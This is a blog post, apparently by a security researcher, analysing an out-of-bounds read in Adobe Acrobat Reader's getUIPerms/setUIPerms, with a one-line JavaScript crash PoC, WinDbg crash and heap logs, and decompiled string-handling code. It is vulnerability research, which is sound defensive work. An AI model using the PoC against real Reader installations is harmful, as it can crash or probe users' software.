<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Unicode String Out-of-bound Read8月补丁被xlab撞了，索性就放出来了。 [TOC]">
<meta property="og:type" content="article">
<meta property="og:title" content="Adobe Acrobat Reader getUIPerms&#x2F;setUIPerms  Unicode String Out-of-bound Read">
<meta property="og:url" content="https://o0xmuhe.github.io/2019/08/14/Adobe-Acrobat-Reader-getUIPerms-setUIPerms-Unicode-String-Out-of-bound-Read/index.html">
<meta property="og:site_name" content="o0xmuhe&#39;s blog">
<meta property="og:description" content="Unicode String Out-of-bound Read8月补丁被xlab撞了，索性就放出来了。 [TOC]">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://blogimg-10065924.cos.ap-shanghai.myqcloud.com/adobe%20reader%20oobr/15513280448165.jpg">
<meta property="og:image" content="https://blogimg-10065924.cos.ap-shanghai.myqcloud.com/adobe%20reader%20oobr/15513387673921.jpg">
<meta property="article:published_time" content="2019-08-14T04:43:09.000Z">
<meta property="article:modified_time" content="2021-06-09T14:32:39.603Z">
<meta property="article:author" content="muhe">
<meta property="article:tag" content="Adobe Reader">
<meta property="article:tag" content="1day">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://blogimg-10065924.cos.ap-shanghai.myqcloud.com/adobe%20reader%20oobr/15513280448165.jpg">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Adobe Acrobat Reader getUIPerms/setUIPerms  Unicode String Out-of-bound Read</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
      <link rel="alternate" href="/true" title="o0xmuhe&#39;s blog" type="application/atom+xml" />
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 5.4.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/archives/">Articles</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/categories/">Categories</a></li><!--
     --><!--
       --><li><a href="/tags/">Tags</a></li><!--
     --><!--
       --><li><a href="/search">Search</a></li><!--
     --><!--
       --><li><a href="/atom.xml">RSS</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2019/08/20/macOS-IPC-Study-basic/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2019/08/10/Apple-IPC-DO-Basic/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://o0xmuhe.github.io/2019/08/14/Adobe-Acrobat-Reader-getUIPerms-setUIPerms-Unicode-String-Out-of-bound-Read/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://o0xmuhe.github.io/2019/08/14/Adobe-Acrobat-Reader-getUIPerms-setUIPerms-Unicode-String-Out-of-bound-Read/&text=Adobe Acrobat Reader getUIPerms/setUIPerms  Unicode String Out-of-bound Read"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://o0xmuhe.github.io/2019/08/14/Adobe-Acrobat-Reader-getUIPerms-setUIPerms-Unicode-String-Out-of-bound-Read/&title=Adobe Acrobat Reader getUIPerms/setUIPerms  Unicode String Out-of-bound Read"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://o0xmuhe.github.io/2019/08/14/Adobe-Acrobat-Reader-getUIPerms-setUIPerms-Unicode-String-Out-of-bound-Read/&is_video=false&description=Adobe Acrobat Reader getUIPerms/setUIPerms  Unicode String Out-of-bound Read"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Adobe Acrobat Reader getUIPerms/setUIPerms  Unicode String Out-of-bound Read&body=Check out this article: https://o0xmuhe.github.io/2019/08/14/Adobe-Acrobat-Reader-getUIPerms-setUIPerms-Unicode-String-Out-of-bound-Read/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://o0xmuhe.github.io/2019/08/14/Adobe-Acrobat-Reader-getUIPerms-setUIPerms-Unicode-String-Out-of-bound-Read/&title=Adobe Acrobat Reader getUIPerms/setUIPerms  Unicode String Out-of-bound Read"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://o0xmuhe.github.io/2019/08/14/Adobe-Acrobat-Reader-getUIPerms-setUIPerms-Unicode-String-Out-of-bound-Read/&title=Adobe Acrobat Reader getUIPerms/setUIPerms  Unicode String Out-of-bound Read"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://o0xmuhe.github.io/2019/08/14/Adobe-Acrobat-Reader-getUIPerms-setUIPerms-Unicode-String-Out-of-bound-Read/&title=Adobe Acrobat Reader getUIPerms/setUIPerms  Unicode String Out-of-bound Read"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://o0xmuhe.github.io/2019/08/14/Adobe-Acrobat-Reader-getUIPerms-setUIPerms-Unicode-String-Out-of-bound-Read/&title=Adobe Acrobat Reader getUIPerms/setUIPerms  Unicode String Out-of-bound Read"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://o0xmuhe.github.io/2019/08/14/Adobe-Acrobat-Reader-getUIPerms-setUIPerms-Unicode-String-Out-of-bound-Read/&name=Adobe Acrobat Reader getUIPerms/setUIPerms  Unicode String Out-of-bound Read&description=&lt;h1 id=&#34;Unicode-String-Out-of-bound-Read&#34;&gt;&lt;a href=&#34;#Unicode-String-Out-of-bound-Read&#34; class=&#34;headerlink&#34; title=&#34;Unicode String Out-of-bound Read&#34;&gt;&lt;/a&gt;Unicode String Out-of-bound Read&lt;/h1&gt;&lt;p&gt;8月补丁被xlab撞了，索性就放出来了。&lt;/p&gt;
&lt;p&gt;[TOC]&lt;/p&gt;"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://o0xmuhe.github.io/2019/08/14/Adobe-Acrobat-Reader-getUIPerms-setUIPerms-Unicode-String-Out-of-bound-Read/&t=Adobe Acrobat Reader getUIPerms/setUIPerms  Unicode String Out-of-bound Read"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Unicode-String-Out-of-bound-Read"><span class="toc-number">1.</span> <span class="toc-text">Unicode String Out-of-bound Read</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-PoC"><span class="toc-number">1.1.</span> <span class="toc-text">0x00 : PoC</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-Crash-log"><span class="toc-number">1.2.</span> <span class="toc-text">0x01 : Crash log</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-Analysis"><span class="toc-number">1.3.</span> <span class="toc-text">0x02 : Analysis</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-what-is-root-cause"><span class="toc-number">1.4.</span> <span class="toc-text">0x03 : what is root cause</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-%F0%9F%A4%94"><span class="toc-number">1.5.</span> <span class="toc-text">0x04 : 🤔</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Adobe Acrobat Reader getUIPerms/setUIPerms  Unicode String Out-of-bound Read
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">muhe</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2019-08-14T04:43:09.000Z" itemprop="datePublished">2019-08-14</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/">漏洞分析</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/1day/" rel="tag">1day</a>, <a class="tag-link-link" href="/tags/Adobe-Reader/" rel="tag">Adobe Reader</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h1 id="Unicode-String-Out-of-bound-Read"><a href="#Unicode-String-Out-of-bound-Read" class="headerlink" title="Unicode String Out-of-bound Read"></a>Unicode String Out-of-bound Read</h1><p>8月补丁被xlab撞了，索性就放出来了。</p>
<p>[TOC]</p>
<a id="more"></a>

<h2 id="0x00-PoC"><a href="#0x00-PoC" class="headerlink" title="0x00 : PoC"></a>0x00 : PoC</h2><p><code>doc</code>对象的<code>getUIPerms</code>函数的越界读</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">app.doc.getUIPerms(&#123;<span class="attr">cFeatureName</span>:<span class="string">"\xFE\xFFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"</span>&#125;)</span><br></pre></td></tr></table></figure>

<p>其实setUIPerms也能触发，但是参数和这个getUIPerms不太一样，但是核心问题都是一样的。</p>
<h2 id="0x01-Crash-log"><a href="#0x01-Crash-log" class="headerlink" title="0x01 : Crash log"></a>0x01 : Crash log</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line">0:000&gt; g</span><br><span class="line">(2a70.388): Access violation - code c0000005 (!!! second chance !!!)</span><br><span class="line">eax&#x3D;32d7cf00 ebx&#x3D;0098cbd0 ecx&#x3D;00000000 edx&#x3D;32d7d000 esi&#x3D;00000068 edi&#x3D;7fffffff</span><br><span class="line">eip&#x3D;59ca7675 esp&#x3D;0098ca98 ebp&#x3D;0098caa4 iopl&#x3D;0         nv up ei ng nz ac pe cy</span><br><span class="line">cs&#x3D;0023  ss&#x3D;002b  ds&#x3D;002b  es&#x3D;002b  fs&#x3D;0053  gs&#x3D;002b             efl&#x3D;00010297</span><br><span class="line">EScript!mozilla::HashBytes+0x47e7f:</span><br><span class="line">59ca7675 8a02            mov     al,byte ptr [edx]          ds:002b:32d7d000&#x3D;??</span><br><span class="line">0:000&gt; k10</span><br><span class="line"> # ChildEBP RetAddr  </span><br><span class="line">WARNING: Stack unwind information not available. Following frames may be wrong.</span><br><span class="line">00 0098caa4 59c52b96 EScript!mozilla::HashBytes+0x47e7f</span><br><span class="line">01 0098cab8 59c545c4 EScript!PlugInMain+0x1119</span><br><span class="line">02 0098cad8 59c54331 EScript!PlugInMain+0x2b47</span><br><span class="line">03 0098cb0c 59ca76d5 EScript!PlugInMain+0x28b4</span><br><span class="line">04 0098cb24 59ca29f4 EScript!mozilla::HashBytes+0x47edf</span><br><span class="line">05 0098cb9c 59c93bb3 EScript!mozilla::HashBytes+0x431fe</span><br><span class="line">06 0098cbec 59c93912 EScript!mozilla::HashBytes+0x343bd</span><br><span class="line">07 0098cc64 59ca1f86 EScript!mozilla::HashBytes+0x3411c</span><br><span class="line">08 0098cce0 59c86d06 EScript!mozilla::HashBytes+0x42790</span><br><span class="line">09 0098cd54 59c8175d EScript!mozilla::HashBytes+0x27510</span><br><span class="line">0a 0098d210 59c80606 EScript!mozilla::HashBytes+0x21f67</span><br><span class="line">0b 0098d250 59c80517 EScript!mozilla::HashBytes+0x20e10</span><br><span class="line">0c 0098d28c 59c80460 EScript!mozilla::HashBytes+0x20d21</span><br><span class="line">0d 0098d2bc 59c68ec3 EScript!mozilla::HashBytes+0x20c6a</span><br><span class="line">0e 0098d304 59ca87ac EScript!mozilla::HashBytes+0x96cd</span><br><span class="line">0f 0098d380 59ca84ec EScript!mozilla::HashBytes+0x48fb6</span><br><span class="line">0:000&gt; dd edx-10</span><br><span class="line">32d7cff0  41414141 41414141 41414141 d0004141</span><br><span class="line">32d7d000  ???????? ???????? ???????? ????????</span><br><span class="line">32d7d010  ???????? ???????? ???????? ????????</span><br><span class="line">32d7d020  ???????? ???????? ???????? ????????</span><br><span class="line">32d7d030  ???????? ???????? ???????? ????????</span><br><span class="line">32d7d040  ???????? ???????? ???????? ????????</span><br><span class="line">32d7d050  ???????? ???????? ???????? ????????</span><br><span class="line">32d7d060  ???????? ???????? ???????? ????????</span><br><span class="line"></span><br><span class="line">0:000&gt; dd edx-0x80</span><br><span class="line">32d7cf80  00000067 00001000 00000000 00000000</span><br><span class="line">32d7cf90  0475f34c dcbabbbb 4141fffe 41414141</span><br><span class="line">32d7cfa0  41414141 41414141 41414141 41414141</span><br><span class="line">32d7cfb0  41414141 41414141 41414141 41414141</span><br><span class="line">32d7cfc0  41414141 41414141 41414141 41414141</span><br><span class="line">32d7cfd0  41414141 41414141 41414141 41414141</span><br><span class="line">32d7cfe0  41414141 41414141 41414141 41414141</span><br><span class="line">32d7cff0  41414141 41414141 41414141 d0004141</span><br></pre></td></tr></table></figure>

<p>参数是 <code>\xFE\xFF\x41414141.....</code></p>
<p><code>edx</code>指向参数</p>
<h2 id="0x02-Analysis"><a href="#0x02-Analysis" class="headerlink" title="0x02 : Analysis"></a>0x02 : Analysis</h2><p>读<code>unicode</code>字符串函数，是没有问题的，应该是上层逻辑的问题，没有做充分的判断，导致用读<code>unicode string</code>的逻辑去读取了<code>ascii string</code> 。</p>
<p>这就导致，读取了更多的数据，然后就<code>oob</code>了。</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">unsigned</span> <span class="keyword">int</span> __cdecl <span class="title">sub_23802B75</span><span class="params">(<span class="keyword">char</span> *a1, <span class="keyword">unsigned</span> <span class="keyword">int</span> a2, <span class="keyword">void</span> (__cdecl *a3)(<span class="keyword">const</span> <span class="keyword">wchar_t</span> *, <span class="keyword">const</span> <span class="keyword">wchar_t</span> *, <span class="keyword">const</span> <span class="keyword">wchar_t</span> *, <span class="keyword">unsigned</span> <span class="keyword">int</span>, <span class="keyword">uintptr_t</span>))</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> result; <span class="comment">// eax</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> ( a1 &amp;&amp; *a1 == <span class="number">0xFE</span>u &amp;&amp; a1[<span class="number">1</span>] == <span class="number">0xFF</span>u )</span><br><span class="line">    result = sub_2385763B(a1, a2, a3);          <span class="comment">// unicode</span></span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">    result = sub_23802BA9(a1, a2, a3);          <span class="comment">// ascii string</span></span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>调试，漏洞发生时参数信息如下：</p>
<p><img src="https://blogimg-10065924.cos.ap-shanghai.myqcloud.com/adobe%20reader%20oobr/15513280448165.jpg"></p>
<p>可以看到，传入的参数并不是<code>unicode string</code>，但是却按照<code>unicode string</code>的代码逻辑去读，所以就越界了。</p>
<p>上一层逻辑中，我们看到，对于读取字符串的逻辑来说，只简单的检查了：</p>
<ol>
<li>字符串是否有效</li>
<li>字符串开头是否是\xFE\xFF</li>
<li>满足2，就走unicode逻辑</li>
<li>不满足就走ascii逻辑</li>
</ol>
<p>但是这里应该不是<code>root cause</code>，而且这部分底层逻辑也没啥问题，应该是上层的逻辑出了问题，导致下层代码执行时候崩溃。</p>
<p>问题出在 <code>app.doc.getUIPerms()</code> 函数实现，在参数传递的时候，参数处理考虑不周导致。</p>
<p>需要找这个对象注册方法的地方，找了一圈，发现这个方法的实现在<code>DigSig.api</code>中。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">0:000&gt; da poi(esp+8)</span><br><span class="line">553dfbbc  &quot;getUIPerms&quot;</span><br><span class="line">0:000&gt; ln poi(esp+c)</span><br><span class="line">(55311705)   DigSig!PlugInMain+0x48f3a   |  (55311705)   DigSig!PlugInMain</span><br></pre></td></tr></table></figure>

<p>但是调试发现，根本没有触发到这里的代码逻辑。</p>
<p>追踪堆内存</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">    address 46df9f98 found in</span><br><span class="line">    _DPH_HEAP_ROOT @ 5c91000</span><br><span class="line">    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)</span><br><span class="line">                                471b1820:         46df9f98               67 -         46df9000             2000</span><br><span class="line">    5a52abb0 verifier!VerifierDisableFaultInjectionExclusionRange+0x000034c0</span><br><span class="line">    7707246b ntdll!RtlDebugAllocateHeap+0x00000039</span><br><span class="line">    76fd6dd9 ntdll!RtlpAllocateHeap+0x000000f9</span><br><span class="line">    76fd5ec9 ntdll!RtlpAllocateHeapInternal+0x00000179</span><br><span class="line">    76fd5d3e ntdll!RtlAllocateHeap+0x0000003e</span><br><span class="line">*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\System32\ucrtbase.dll - </span><br><span class="line">    74840106 ucrtbase!malloc_base+0x00000026</span><br><span class="line">    5782a2bc AcroRd32!AXWasInitViaPDFL+0x000008cf</span><br><span class="line">    5782e829 AcroRd32!CTJPEGLibInit+0x00002039</span><br><span class="line">    542245d8 EScript!PlugInMain+0x00002b5b &#x2F;&#x2F;this will call alloc func</span><br><span class="line">    54224331 EScript!PlugInMain+0x000028b4</span><br><span class="line">    542776d5 EScript!mozilla::HashBytes+0x00047edf</span><br><span class="line">    542729f4 EScript!mozilla::HashBytes+0x000431fe</span><br><span class="line">    54263bb3 EScript!mozilla::HashBytes+0x000343bd</span><br><span class="line">    54263912 EScript!mozilla::HashBytes+0x0003411c</span><br><span class="line">    54271f86 EScript!mozilla::HashBytes+0x00042790</span><br><span class="line">    54256d06 EScript!mozilla::HashBytes+0x00027510</span><br><span class="line">    5425175d EScript!mozilla::HashBytes+0x00021f67</span><br><span class="line">    54250606 EScript!mozilla::HashBytes+0x00020e10</span><br><span class="line">    54250517 EScript!mozilla::HashBytes+0x00020d21</span><br><span class="line">    54250460 EScript!mozilla::HashBytes+0x00020c6a</span><br><span class="line">    54238ec3 EScript!mozilla::HashBytes+0x000096cd</span><br><span class="line">    542787ac EScript!mozilla::HashBytes+0x00048fb6</span><br><span class="line">    542784ec EScript!mozilla::HashBytes+0x00048cf6</span><br><span class="line">    542780e5 EScript!mozilla::HashBytes+0x000488ef</span><br><span class="line">    542770b4 EScript!mozilla::HashBytes+0x000478be</span><br><span class="line">    542e85e9 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x00061731</span><br><span class="line">    5803da6f AcroRd32!AIDE::PixelPartInfo::operator&#x3D;+0x0010536f</span><br><span class="line">    57f6723a AcroRd32!AIDE::PixelPartInfo::operator&#x3D;+0x0002eb3a</span><br><span class="line">    57f6345e AcroRd32!AIDE::PixelPartInfo::operator&#x3D;+0x0002ad5e</span><br><span class="line">    57d3002d AcroRd32!AX_PDXlateToHostEx+0x001ff9b5</span><br><span class="line">    57d3057c AcroRd32!AX_PDXlateToHostEx+0x001fff04</span><br><span class="line">    57f66e8e AcroRd32!AIDE::PixelPartInfo::operator&#x3D;+0x0002e78e</span><br></pre></td></tr></table></figure>



<p>callstack 和 堆追踪 得到的结果 前部分重合，内存在</p>
<p><img src="https://blogimg-10065924.cos.ap-shanghai.myqcloud.com/adobe%20reader%20oobr/15513387673921.jpg" alt="-w699"></p>
<p>这个call里分配，这个call一直到核心dll再到ntdll去分配内存。</p>
<p>分析的参数来源发现：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">else if ( a3 &#x3D;&#x3D; 2 )</span><br><span class="line">  &#123;</span><br><span class="line">    v17 &#x3D; (*(int (__cdecl **)(_DWORD, void *))(dword_23A65354 + 0x60))(*v4, Src);&#x2F;&#x2F; </span><br><span class="line">                                              &#x2F;&#x2F; </span><br><span class="line">                                              &#x2F;&#x2F; 0:000&gt; dd 4bc86fe8 </span><br><span class="line">                                              &#x2F;&#x2F; 4bc86fe8  000000cc 4f6d0f30 00000000 00000000</span><br><span class="line">                                              &#x2F;&#x2F; 4bc86ff8  00000000 00000000 ???????? ????????</span><br><span class="line">                                              &#x2F;&#x2F; 4bc87008  ???????? ???????? ???????? ????????</span><br><span class="line">                                              &#x2F;&#x2F; 4bc87018  ???????? ???????? ???????? ????????</span><br><span class="line">                                              &#x2F;&#x2F; 4bc87028  ???????? ???????? ???????? ????????</span><br><span class="line">                                              &#x2F;&#x2F; 4bc87038  ???????? ???????? ???????? ????????</span><br><span class="line">                                              &#x2F;&#x2F; 4bc87048  ???????? ???????? ???????? ????????</span><br><span class="line">                                              &#x2F;&#x2F; 4bc87058  ???????? ???????? ???????? ????????</span><br><span class="line">                                              &#x2F;&#x2F; </span><br><span class="line">                                              &#x2F;&#x2F; length str</span><br><span class="line">                                              &#x2F;&#x2F; </span><br><span class="line">                                              &#x2F;&#x2F; unicode str--&gt; ascii str</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure>

<p>这个调用对数据作处理，输入数据：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">0:000&gt; dd 4f6d0f30 </span><br><span class="line">4f6d0f30  00ff00fe 00410041 00410041 00410041</span><br><span class="line">4f6d0f40  00410041 00410041 00410041 00410041</span><br><span class="line">4f6d0f50  00410041 00410041 00410041 00410041</span><br><span class="line">4f6d0f60  00410041 00410041 00410041 00410041</span><br><span class="line">4f6d0f70  00410041 00410041 00410041 00410041</span><br><span class="line">4f6d0f80  00410041 00410041 00410041 00410041</span><br><span class="line">4f6d0f90  00410041 00410041 00410041 00410041</span><br><span class="line">4f6d0fa0  00410041 00410041 00410041 00410041</span><br><span class="line">0:000&gt; dd 4f6d0f30  + 0xcc</span><br><span class="line">4f6d0ffc  d0d00000 ???????? ???????? ????????</span><br><span class="line">4f6d100c  ???????? ???????? ???????? ????????</span><br><span class="line">4f6d101c  ???????? ???????? ???????? ????????</span><br><span class="line">4f6d102c  ???????? ???????? ???????? ????????</span><br><span class="line">4f6d103c  ???????? ???????? ???????? ????????</span><br><span class="line">4f6d104c  ???????? ???????? ???????? ????????</span><br><span class="line">4f6d105c  ???????? ???????? ???????? ????????</span><br><span class="line">4f6d106c  ???????? ???????? ???????? ????????</span><br></pre></td></tr></table></figure>

<p>得到的结果是:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">0:000&gt; r eax</span><br><span class="line">eax&#x3D;4b9cef98</span><br><span class="line">0:000&gt; dd eax</span><br><span class="line">4b9cef98  4141fffe 41414141 41414141 41414141</span><br><span class="line">4b9cefa8  41414141 41414141 41414141 41414141</span><br><span class="line">4b9cefb8  41414141 41414141 41414141 41414141</span><br><span class="line">4b9cefc8  41414141 41414141 41414141 41414141</span><br><span class="line">4b9cefd8  41414141 41414141 41414141 41414141</span><br><span class="line">4b9cefe8  41414141 41414141 41414141 41414141</span><br><span class="line">4b9ceff8  41414141 d0004141 ???????? ????????</span><br><span class="line">4b9cf008  ???????? ???????? ???????? ????????</span><br></pre></td></tr></table></figure>

<p>然后直接把这个<code>buffer</code>为参数传递给处理函数（此时这是一个ascii string)</p>
